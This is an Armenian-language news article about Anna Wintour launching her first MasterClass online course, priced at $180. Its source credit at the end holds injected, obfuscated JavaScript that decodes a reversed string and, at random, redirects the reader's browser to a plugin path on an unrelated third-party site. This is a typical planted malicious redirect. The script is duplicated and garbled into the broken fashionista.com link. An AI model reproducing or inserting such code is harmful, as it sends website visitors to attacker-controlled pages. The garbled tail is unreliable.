Աննա Վինտուրը սկսում է իր առաջին առցանց դասընթացը

Երբևէ ցանկացե՞լ եք սովորել նորաձևության կենդանի լեգենդ Աննա Վինտուրից: Եթե այո, ապա ձեզ համար լավ նորություն ունենք: Ամերիկյան Vogue ամսագրի գեղարվեստական ղեկավարը հայտարարել է իր առաջին առցանց դասընթացի մեկնարկի մասին՝ masterclass.com հարթակում:

«Այս դասընթացը նրանց համար է, ովքեր ցանկանում են հասկանալ իմ ոճը, հասկանալ այն փորձությունները, որոնք ինձ օգնել են հմուտ ղեկավար դառնալ», – պատմում է Վինտուրը: «Ես նախկինում երբեք առիթ չեմ ունեցել կիսվելու իմ փորձով որպես խմբագիր և գեղավերստական ղեկավար»:

Դասընթացի համար MasterClass-ի կողմից սահմանված 180 ԱՄՆ դոլարի չափով վճարն առաջին հայացքից կարող է շատ թվալ, քանի որ Վինտուրն, ըստ էության, հետադարձ կապ դասընթացի մասնակիցների հետ չի ունենալու և տեսանյութերի միջոցով «բացառիկ ուսումնական նյութեր» է ներկայացնելու: Սակայն հաշվի առնելով այն հանգամանքը, որ նա սոցիալական սանցերում անձնական էջեր չունի, որտեղ կկարողանար կիսվել իր մտքերով, այդ վճարը կարելի է արդարացված համարել և վստահություն հայտնել, որ դասընթացը կգտնի իր լսարանը:

Աղբյուր՝ $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour-masterclass-creativity-leadership?fbclid=IwAR0YBKeon586dDPHOBofJd0uFCowfw1v5VK8bKIvWb2HrWQezeO3lx13SUs” target=”_blank” rel=”noopener”>fashionista.com